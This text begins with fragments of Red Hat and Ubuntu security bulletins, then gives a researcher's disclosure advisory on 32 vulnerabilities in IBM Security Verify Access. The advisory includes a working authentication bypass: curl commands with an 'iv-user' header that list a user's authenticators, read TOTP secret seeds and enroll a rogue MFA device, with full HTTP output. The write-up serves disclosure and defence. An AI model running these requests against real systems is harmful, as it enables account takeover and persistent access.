2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds 2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody 2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection 2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling 2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read 2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite() 2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match() 2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability 2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism 2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection 2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2099305 - CVE-2022-32207 curl: Unpreserved file permissions 2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification 2116639 - CVE-2022-37434 zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field 2120718 - CVE-2022-35252 curl: control code in cookie denial of service 2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c 2135411 - CVE-2022-32221 curl: POST following PUT confusion 2135413 - CVE-2022-42915 curl: HTTP proxy double-free 2135416 - CVE-2022-42916 curl: HSTS bypass via IDN 2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE 2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles

  1. ========================================================================== Ubuntu Security Notice USN-6457-1 October 30, 2023

nodejs vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in Node.js.

Software Description: - nodejs: An open-source, cross-platform JavaScript runtime environment.

Details:

Tavis Ormandy discovered that Node.js incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service. (CVE-2022-0778)

Elison Niven discovered that Node.js incorrectly handled certain inputs. (CVE-2022-1292)

Chancen and Daniel Fiala discovered that Node.js incorrectly handled certain inputs. (CVE-2022-2068)

Alex Chernyakhovsky discovered that Node.js incorrectly handled certain inputs. (CVE-2022-2097)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 22.04 LTS: libnode-dev 12.22.9~dfsg-1ubuntu3.1 libnode72 12.22.9~dfsg-1ubuntu3.1 nodejs 12.22.9~dfsg-1ubuntu3.1 nodejs-doc 12.22.9~dfsg-1ubuntu3.1

In general, a standard system update will make all the necessary changes. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly, for detailed release notes:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects 2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS 2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays

  1. JIRA issues fixed (https://issues.jboss.org/):

LOG-3293 - log-file-metric-exporter container has not limits exhausting the resources of the node

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Advisory Information

Title: 32 vulnerabilities in IBM Security Verify Access Advisory URL: https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt Blog URL: https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html Date published: 2024-11-01 Vendors contacted: IBM Release mode: Released CVE: CVE-2022-2068, CVE-2023-30997, CVE-2023-30998, CVE-2023-31001, CVE-2023-31004, CVE-2023-31005, CVE-2023-31006, CVE-2023-32328, CVE-2023-32329, CVE-2023-32330, CVE-2023-38267, CVE-2023-38267, CVE-2023-38368, CVE-2023-38369, CVE-2023-38370, CVE-2023-43017, CVE-2024-25027, CVE-2024-35137, CVE-2024-35139, CVE-2024-35140, CVE-2024-35141, CVE-2024-35142

Product description

IBM Security Verify Access is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. In addition to state-of-the-art security policy management, IBM Security Verify Access provides authentication, authorization, data security, and centralized resource management capabilities.

IBM Security Verify Access offers the following features:

  • Authentication

Provides a wide range of built-in authenticators and supports external authenticators.

  • Authorization

Provides permit and deny decisions for protected resources requests in the secure domain through the authorization API.

  • Data security and centralized resource management

Manages secure access to private internal network-based resources by using the public Internet's broad connectivity and ease of use with a corporate firewall system.

From https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access

Vulnerability Summary

Vulnerable versions: IBM Security Verify Access < 10.0.8.

The summary of the vulnerabilities is as follows:

  1. non-assigned CVE vulnerability - Authentication Bypass on IBM Security Verify Runtime
  2. CVE-2024-25027 - Reuse of snapshot private keys
  3. CVE-2023-30997 - Local Privilege Escalation using OpenLDAP
  4. CVE-2023-30998 - Local Privilege Escalation using rpm
  5. CVE-2023-38267, CVE-2024-35141, CVE-2024-35142 - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes 5.1. CVE-2023-38267 - Local Privilege Escalation using mesa_config - import of a new snapshot 5.2. CVE-2024-35141 - Local Privilege Escalation using mesa_config - command injections 5.3. CVE-2023-38267 - Local Privilege Escalation using mesa_cli - import of a new snapshot 5.4. CVE-2024-35142 - Local Privilege Escalation using mesa_cli - telnet escape shell
  6. CVE-2023-43017 - PermitRootLogin set to yes
  7. CVE-2024-35137 and CVE-2024-35139 - Lack of password for the cluster user
  8. CVE-2023-38368 - Non-standard way of storing hashes and world-readable files containing hashes
  9. CVE-2023-38369 - Hardcoded PKCS#12 files
  10. CVE-2023-31001 - Incorrect permissions in verify-access-dsc (race condition and leak of private key
  11. non-assigned CVE vulnerability - Insecure health_check.sh script in verify-access (race condition and leak of private key)
  12. CVE-2024-35140 - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)
  13. CVE-2024-35140 (duplicate?) - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)
  14. CVE-2023-31004 - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp
  15. CVE-2023-31005 - Lack of authentication in Postgres inside verify-access-runtime
  16. CVE-2023-31006 - Null pointer dereference in dscd - Remote DoS against DSC instances
  17. CVE-2023-32327 - XML External Entity (XXE) in dscd
  18. CVE-2023-38370 - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)
  19. non-assigned CVE vulnerability - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)
  20. CVE-2023-32328 - Remote Code Execution due to insecure Repository configuration
  21. CVE-2023-32329 - Additional repository configuration (potential supply-chain attack)
  22. non-assigned CVE vulnerability - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime
  23. CVE-2023-32330 - Remote Code Execution due to insecure reload script in verify-access-runtime
  24. CVE-2023-32330 (duplicate?) - Remote Code Execution due to insecure reload script in verify-access-wrp
  25. non-assigned CVE vulnerability - Hardcoded private key for IBM ISS (ibmcom/verify-access)
  26. non-assigned CVE vulnerability - dcatool using an outdated OpenSSL library (ibmcom/verify-access)
  27. non-assigned CVE vulnerability - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys
  28. non-assigned CVE vulnerability - Outdated "IBM Crypto for C" library
  29. non-assigned CVE vulnerability - Webseald using outdated code with remotely exploitable vulnerabilities 30.1. Libmodsecurity.so - 1 non-assigned CVE vulnerability 30.2. libtivsec_yamlcpp.so - 4 CVEs 30.3. libtivsec_xml4c.so - outdated Xerces-C library
  30. non-assigned CVE vulnerability - Outdated and untrusted CAs used in the Docker images
  31. non-assigned CVE vulnerability - Lack of privilege separation in Docker instances

TL;DR: An attacker can compromise IBM Security Verify Access using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). IBM Security Verify Access is a SSO solution mainly used by banks, Fortune 500 companies and governmental entities.

Miscellaneous notes:

The vulnerabilities were found in October 2022 and were communicated to IBM at the beginning of 2023. They ultimately were patched at the end of June 2024 (after 18 months). Requiring 1.5 years to provide security patches for vulnerabilities found in a SSO solution does not appear to be in par with current cybersecurity risks and is quite worrying. Update: Following communications with IBM PSIRT in September 2024 regarding missing CVEs and the publication of this security advisory, it was confirmed that at least one vulnerability was not yet patched (a 2017 DoS in libinjection, no CVE).

The vulnerabilities were patched progressively in the 10.0.6, 10.0.7 and 10.0.8 versions. It is unclear if all the non-assigned CVE vulnerabilities have been patched but IBM confirmed that all the vulnerabilities were patched and then IBM closed all the corresponding tickets.

Other issues had been reported but ultimately were dismissed (e.g. hard-to-trigger crashes and I did not have any time left for this security assessment).

Communication with IBM was difficult since IBM closed the tickets used to track the vulnerabilities multiple times without releasing any security patches. The timeline provided at the later part of this advisory provides an overview of the interactions I have had with IBM. IBM PSIRT redirected queries to IBM support and IBM support provided extremely disappointing answers to vulnerabilities. When I went back to IBM PSIRT with these answers, IBM PSIRT refused them and provided opposite answers. Reporting vulnerabilities to IBM was also inefficient. When I asked IBM for missing CVEs in September 2024, IBM PSIRT confirmed that patches were missing. All the tickets were already closed in June 2024 by IBM and I previously received confirmation that all the vulnerabilities had been patched.

Security bulletins were mainly found by following @CVEnew (https://twitter.com/CVEnew) and I had to guess the patched vulnerabilities from the CVE descriptions. After some requests, thankfully, IBM sent me a list of CVEs corresponding to the vulnerabilities I reported.

It appears that some CVEs are still missing.

Finally, another CVE (CVE-2023-38371 - https://nvd.nist.gov/vuln/detail/CVE-2023-38371), not present in this advisory) was assigned by IBM but refers to an issue (V-[REDACTED] - Insecure SSLv3 connections to the DSC servers in the report sent to IBM) that was confirmed not to be a vulnerability by IBM and by me, after a second analysis. This CVE is likely to be revoked. Update: IBM confirmed in September 2024 that this CVE was bogus after I signaled IBM that this is an incorrect CVE.

Impacts

An attacker can compromise the entire authentication infrastructure based on IBM Security Verify Access (ISAM/ISVA appliances and IBM Docker images) using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). Regarding the threat model, it is worth noting that attackers must be able to MITM traffic or get access inside the LAN of the tested organizations to exploit these vulnerabilities.

When the IBM Security Verify Access (ISVA) runtime docker instance (a core component of this solution) is reachable over the network, an attacker can bypass the entire authentication and interact with this back-end instance as any user, providing a complete control over any user without authentication. The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities and is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users (for example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...). The back-end APIs provided by the IBM Security Verify Access runtime docker instance are vulnerable to an authentication bypass vulnerability. Since the back-end is fully reachable, this vulnerability allows an attacker to get persistence in a targeted infrastructure by enrolling malicious Multi-Factor Authenticators to any user, without authentication (e.g. an authenticator assigned to any user, protected by a PIN (or not) chosen by the threat actor). In an offensive scenario, an attacker will likely delete authenticators for admins and security team and enroll new authenticators corresponding to admin accounts and get full control over the infrastructure while locking out legit admins.

This vulnerability has not been patched and IBM recommends implementing network restrictions or using mutual TLS authentication and following best practices:

Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication.

From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1

And from https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters

And from https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications

Note that even with network restrictions, a low privileged user on a trusted machine can fully compromise the authentication solution, since the back-end used to manage the entire authentication infrastructure can be reached without authentication by sending a specific HTTP header. Network exposure of this back-end (e.g. with IPv6, from monitoring servers, from docker servers, from webseal servers [that must, by design, reach the authentication back-end], or using a SSRF vulnerability) means a full take over of the authentication infrastructure, which can be quite problematic for large organizations.

Recommendations

    • Apply security patches.
    • Use network segmentation to isolate the Security Verify Access (ISVA) Runtime Docker instance.
    • Implement the optional authentication based on SSL certificates in the ISVA Runtime Docker instance (this functionality has been added in the latest ISVA release (10.0.8)).
    • Flag any additional authenticator added to an account as suspicious.
    • Review logs for any HTTP access from untrusted IPs to the Security Verify Access Runtime Docker instance.

Shodan provides a list of websites using this technology. For SOC teams, I suggest using Shodan to check if your organization is using IBM Security Verify Access and following IBM's security recommendations. Please note that due to the versatility of this solution, it is very difficult to correctly detect affected installations using a blackbox approach:

    • https://www.shodan.io/search?query=http.favicon.hash%3A-2069014068, 1,740 results as of October 30, 2024
    • https://www.shodan.io/search?query=webseal, 1,083 results as of October 30, 2024
    • https://www.shodan.io/search?query=CP%3D%22NON+CUR+OTPi+OUR+NOR+UNI%22, 6,673 results as of October 30, 2024

Details - Authentication Bypass on IBM Security Verify Runtime

It is possible to compromise the authentication mechanism and the authentication infrastructure by reaching the APIs provided by the IBM Security Verify Runtime Docker instance.

The threat model for this vulnerability requires an attacker with network connectivity to the IBM Security Verify Runtime Docker instance (i) from the Internet (if this service is insecurely exposed) or (ii) more likely from within LAN of the audited organization (meaning the threat actor can reach the HTTPS server of IBM Security Verify Runtime Docker instance).

The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities. It is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users. For example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...

The different authentication mechanisms in the APIs provided by the Runtime Docker instance used to manage users (e.g. adding an authenticator for a specific user, removing an authenticator, getting seeds, ...) can be trivially bypassed by specifying an additional HTTP header iv-user: target-user (e.g. iv-user: admin) in the HTTPS requests.

Adding an additional HTTP header iv-user: target-user when querying the APIs will provide a complete control over the target-user.

There is a HTTPs server reachable on port 443/tcp providing APIs:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Usually, the IBM Security Verify Runtime Docker instance is only reached by WebSEAL servers (reverse-proxies managing authentication), after a successful authentication as easuser, as shown below:

Documentation from https://www.ibm.com/docs/SSPREK_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:

Select the method for authentication between WebSEAL and the Advanced Access Control runtime listening interface

Certificate authentication

Use a certificate to authenticate between WebSEAL and the Advanced Access Control runtime listening interface.

User ID and password authentication

Use credentials to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. The default username is easuser and the default password is passw0rd.

Attack scenario: an attacker will reach the HTTPS APIs provided by the IBM Security Verify Runtime Docker instance and will not use a SSL Certificate or any credential used to manage the instance (easuser).

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Note that while the WebSEAL are exposed to the Internet, the runtime instance is located inside the LAN and is not usually exposed to the Internet. The attacker needs to be located inside the LAN to reach the vulnerable APIs.

According to the documentation at https://www.ibm.com/docs/en/sva/10.0.7, we can see that the APIs are always reachable using the /mga/sps/* path. Actually, the /mga/ route seems to be managed by WebSEAL servers while the /sps/* routes are managed by the runtime docker instance.

Without authentication, an attacker can reach the IBM Security Verify Runtime Docker image docker instance by reaching, for example, the /sps/oauth/oauth20/authorize?client_id=ClientID&response_type=code&scope=mmfaAuthn API endpoint and specifying which target user to compromise using the additional HTTP header iv-user: target-user. This specific endpoint is used to enroll a new Multiple-Factor Authenticator (e.g. the official IBM Security Verify app (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) for the target-user user.

By specifying the HTTP header iv-user: target-user, an attacker can interact with all the APIs located in /sps/* for any user, without authentication.

Listing of authenticators without any cookie or HTTP header - this non-intrusive request allows detecting a vulnerable IBM Security Verify Runtime Docker instance configured to use MFA. 

kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators | jq . 
{
  "result": "FBTRBA306E The user management operation failed because the user is not authenticated."
}

Listing of authenticators for the target-user - with iv-user HTTP header (without session cookies nor specific credentials):

kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H "iv-user: target-user" | jq . 
[
  {
    "device_name": "Iphone 13 Pro Max",
    "oauth_grant": "uuida71[REDACTED]",
    "auth_methods": [],
    "os_version": "13",
    "device_type": "[REDACTED]",
    "id": "uuid20[REDACTED]",
    "enabled": true
  },
  {
    "device_name": "Iphone 13 Pro Max",
    "oauth_grant": "uuida71[REDACTED]",
    "auth_methods": [],
    "os_version": "13",
    "device_type": "[REDACTED]",
    "id": "uuid20[REDACTED]",
    "enabled": true
  },
[...]
kali%

It is possible to enroll any new authenticator for the user target without authentication by reaching the IBM Security Verify Runtime instance and specifying iv-user: target-user in the HTTP header:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

A PoC is provided below. The provided secret code allows enrolling a new authenticator for the target user target-user. Note that the client_id variable must be edited as we use the specific TestAuthenticatorClient client identifier. The valid client_id variable can be retrieved from the /sps/mga/user/mgmt/grant API:

kali% curl -kv -H "iv-user: target-user" https://test-runtime/sps/mga/user/mgmt/grant | jq . 
{
  "grants": [
    {
      "id": "uuida71[REDACTED]",
      "isEnabled": true,
      "clientId": "TestAuthenticatorClient",
[...]

I suggest using the specific client_id identifier configured in the targeted instance. The correct client_id identifier can also be obtained by visiting https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html. The device_selection.html webpage is just a front-end to get access to several APIs:

    • /sps/mga/user/mgmt/grant
    • /sps/mmfa/user/mgmt/authenticators
    • /sps/fido2/registrations
    • /sps/mga/user/mgmt/device
    • /sps/apiauthsvc/policy/u2f_register
    • /sps/mga/user/mgmt/clients
    • ...

For example, visiting a remote IBM Security Verify Runtime instance athttps://url/sps/mga/user/mgmt/html/device/device_selection.html without an iv-user: target-user HTTP header will return empty information (since the resulting requests sent to APIs are not "authenticated"):

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Visiting the same address https://url/sps/mga/user/mgmt/html/device/device_selection.html using Burp Suite Pro, and (i) adding a HTTP Header iv-user: target-user in all the resulting HTTP requests and (ii) rewriting the URL from ^\/mga\/sps\/ to \/sps\/ (since the /mga/ path is hardcoded in JavaScript code) will now provide a full access for the target-user (adding an authenticator, deleting an authenticator, adding passkeys, ...).

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

An attacker can also add an new authenticator for any user using curl:

PoC:

kali% curl -kv "https://test-runtime/sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient&response_type=code&scope=mmfaAuthn" -H "iv-user: target-user"          
* Host test-runtime:443 was resolved. 
* IPv6: (none)
* IPv4: 10.0.0.15
*   Trying 10.0.0.15:443... 
* Connected to test-runtime (10.0.0.15) port 443
* using HTTP/1.x
> GET /sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient&response_type=code&scope=mmfaAuthn HTTP/1.1
> Host: test-runtime
> User-Agent: curl/8.5.0
> Accept: */*
> iv-user: target-user
> 
< HTTP/1.1 302 Found
< X-Frame-Options: SAMEORIGIN
< Pragma: no-cache
< Location: https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient&code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y
< Content-Language: en-US
< Transfer-Encoding: chunked
< Date: Sat, 07 Sep 2024 12:07:21 GMT
< Expires: Thu, 01 Dec 1994 16:00:00 GMT
< Cache-Control: no-store, no-cache=set-cookie
< 
* Connection #0 to host test-runtime left intact

The resulting secret code provided in the HTTP answer can be used to enroll an official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) corresponding to the target-user.

In order to import this secret token inside an IBM Verify Security application (an authenticator), we can:

    • reach the https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient&code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y webpage (without /mga at the beginning of the URL) and scan the generated QR code; Burp Suite Pro is required to replace all the API calls from /mga/sps/ to /sps/; or

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

    • reach the /sps/mmfa/user/mgmt/qr_code/json API to get the json encoded data inside the QR code (using ?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y&client_id=TestAuthenticatorClient) and generate the QR code (note that in the next HTTP answer, the ignoreSslCerts=true is not the default option); or
GET /sps/mmfa/user/mgmt/qr_code/json?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y&client_id=TestAuthenticatorClient HTTP/1.1
Host: test-runtime
iv-user: target-user
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close


HTTP/1.1 200 OK
Content-Type: application/json
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-Language: en-US
Connection: Close
Date: Sat, 07 Sep 2024 20:39:55 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-store, no-cache=set-cookie
Content-Length: 202

{"code":"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y","options":"ignoreSslCerts=true",
"details_url":"https:\/\/enroll-url\/mga\/sps\/mmfa\/user\/mgmt\/details",
"version":1,"client_id":"TestAuthenticatorClient"}
    • reach the /mga/sps/mmfa/user/mgmt/qr_code/json API (provided by any targeted WebSEAL servers from the same infrastructure, including Internet-faced WebSEAL servers) to get the json encoded data inside the QR code (using ?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y&client_id=TestAuthenticatorClient) and generate the QR code; or
    • simply locally generate the QR code containing the JSON data as shown below using the qrencode program:
    kali% qrencode -o picture.png '{"code":"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y","options":"ignoreSslCerts=false","details_url":"https:\/\/enroll-url\/mga\/sps\/mmfa\/user\/mgmt\/details","version":1,"client_id":"TestAuthenticatorClient"}'

Then the QR code needs to be scanned using the official IBM Verify Security App (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) in order to enroll a new device. By default, the specific https://enroll-url/mga/sps/mmfa/user/mgmt/details is always reachable from the Internet in order to successfully enroll smartphones.

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) has been used and successfully enrolled for the target-user and can now be used to authenticate as target-user:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The device has been correctly enrolled from the Internet as shown below, by using the /sps/mmfa/user/mgmt/authenticators API without authentication. 

kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H "iv-user: target-user" | jq . 
[
  {
    "device_name": "Samsung S22",
    "oauth_grant": "uuida72253ef[REDACTED]",
    "auth_methods": [
      {
        "key_handle": "32e[REDACTED].userPresence",
        "id": "uuidb694[REDACTED]",
        "type": "user_presence",
        "enabled": true,
        "algorithm": "SHA256withRSA"
      }
    ],
    "os_version": "13",
    "device_type": "[REMOVED]",
    "id": "uuidb4fde[REDACTED]",
    "enabled": true
  },
[...]

Furthermore, all the APIs in /sps/* are directly reachable by specifying the HTTP header iv-user: target-user.

We can also list the secret key for the seed corresponding to OTP:

kali% curl -ks https://test-runtime/sps/mga/user/mgmt/otp/totp -H "iv-user: target-user" | jq .          
{                                  
  "period": "30",
  "secretKeyUrl": "otpauth://totp/Example:target-user"?secret=NSJ[REDACTED][REDACTED][REDACTED]&issuer=Example",
  "secretKey": "NSJ[REDACTED][REDACTED][REDACTED]",
  "digits": "6",
  "username": "target-user",
  "algorithm": "HmacSHA1"
}

All the APIs located in /sps/ are vulnerable to this authentication bypass.

As shown previously, it is possible to bypass the entire authentication and interact with the IBM Security Verify runtime docker instance as any user.

An attacker can enroll a device for any user, bypassing the entire access controls, and get control over the infrastructure. Since the back-end is fully reachable, an attacker can also delete any authenticator for any user.

At the time of the security assessment (October 2022), I was not able to find any official documentation that recommends not exposing the runtime instance to the network, since the runtime APIs are password protected.

The latest ISVA release (10.0.8) implements an optional authentication based on SSL certificates. It is strongly recommended to implement this authentication mechanism and not to expose the ISVA runtime instance to the network.

Without this optional authentication, any malicous actor (i) with access to WebSEAL servers (with a shell or a SSRF vulnerability) or (ii) with direct network access to the runtime instance, or (iii) with a shell access to any 'trusted' machine (e.g. a monitoring server querying the HTTPS server of ISVA runtime), or (iv) with a low-privilege shell on the docker server running the solution, can completely compromise the authentication infrastructure, without credentials.

Regarding the official recommendations, IBM recommends (i) not to expose the runtime instance to untrusted clients or (ii) to implement SSL-based certificate authentication and follow the following best practices. IBM provided these references as official responses regarding this issue:

    • From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;
    • And https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;
    • And https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:

Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication.

  • From my understanding, this vulnerability is not going to be patched (no security bulletin was published and no CVE has been assigned, ticket has been closed as solved) because, according to the official recommendations, it is the customer's responsability to filter any communication to the runtime instance. This present security advisory will allow offensive and defensive security teams to correctly understand and improve their security posture.

About the detection of insecure instances, a HTTPS request to the /sps/ route providing the banner Server: IBM Security Verify Access in the HTTPS answer will allow SOC team to detect an instance. The banner will not appear when reaching https://test-runtime/). If MFA is used, a HTTP request to /sps/mga/user/mgmt/html/device/device_selection.html (port 443 or 9443, by default) will allow SOC team to detect an insecure ISVA runtime instance. An answer indicating 200 OK with the content of the device_selection.html webpage will indicate that the tested instance is probably insecure:

kali% curl -k https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html
[...]
< HTTP/1.1 200 OK
< X-Frame-Options: SAMEORIGIN
< Server: IBM Security Verify Access
< Content-Type: text/html;charset=UTF-8
[...]
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>Device Selection</title>
  <link type="text/css" rel="stylesheet" href="/sps/static/design.css"></link>
  <link type="text/css" rel="stylesheet" href="/sps/mga/user/mgmt/html/device/device_selection.css"></link>
  <script type="text/javascript" src="/sps/mga/user/mgmt/html/mgmt_msg.js"></script>
  <script type="text/javascript" src="/sps/static/u2fI18n.js"></script>
  <script type="text/javascript" src="/sps/mga/user/mgmt/html/common.js"></script>
  <script type="text/javascript" src="/sps/mga/user/mgmt/html/device/device_selection.js"></script>

On a side note, from my tests, the APIs are also exposed with authentication from the Internet by visiting https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html. If device_selection.html is blocked, it is simply possible to inject the correct answer with Burp Suite Pro (using the device_selection.html webpage available in official IBM Docker images) and the previous /mga/sps/ APIs are still reachable since they are needed to successfully enroll an authenticator from the Internet (e.g. the official IBM Verify Security App running on a smartphone). An attacker that enrolled a rogue authenticator to a compromised account can get persistence access from the Internet even if the runtime instance is not reachable anymore or if the "regular" ISVA servers are only reachable from inside the company: the APIs provided by the Internet-faced enrolling server will allow the attackers to enroll new authenticators and retrieve current seeds.

Furthermore, with Internet-faced servers (by design, to enroll authenticators) and an authenticated session, the attack surface is quite big.

It is also possible to list the target version of a Internet-faced instance (proxifed through WebSEAL) by visiting the /mga/sps/mmfa/user/mgmt/details API (when MFA is enabled in ISVA):

curl -s https://internet-faced-website/mga/sps/mmfa/user/mgmt/details | jq . 
{
  "authntrxn_endpoint": "https://info.domain.tld/scim/Me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:transactionsPending,urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:attributesPending",
  "metadata": {
    "service_name": "Organisation",
    "qrlogin_endpoint": "https://info.domain.tld/mga/sps/authsvc?PolicyId=urn:ibm:security:authentication:asf:qrcode_response"
[...]
  "enrollment_endpoint": "https://info.domain.tld/scim/Me",
[...]
  "version": "10.0.8.0",
[...]
}

Details - Reuse of snapshot private keys

The official Docker images have been retrieved and analyzed on a local machine:

kali-docker# docker images
REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE
ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB
ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB
ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB
ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB
kali-docker# docker save 498e181d7395 > ibmcom/verify-access-runtime.tar
kali-docker# docker save c0003aca743c > ibmcom/verify-access-wrp.tar
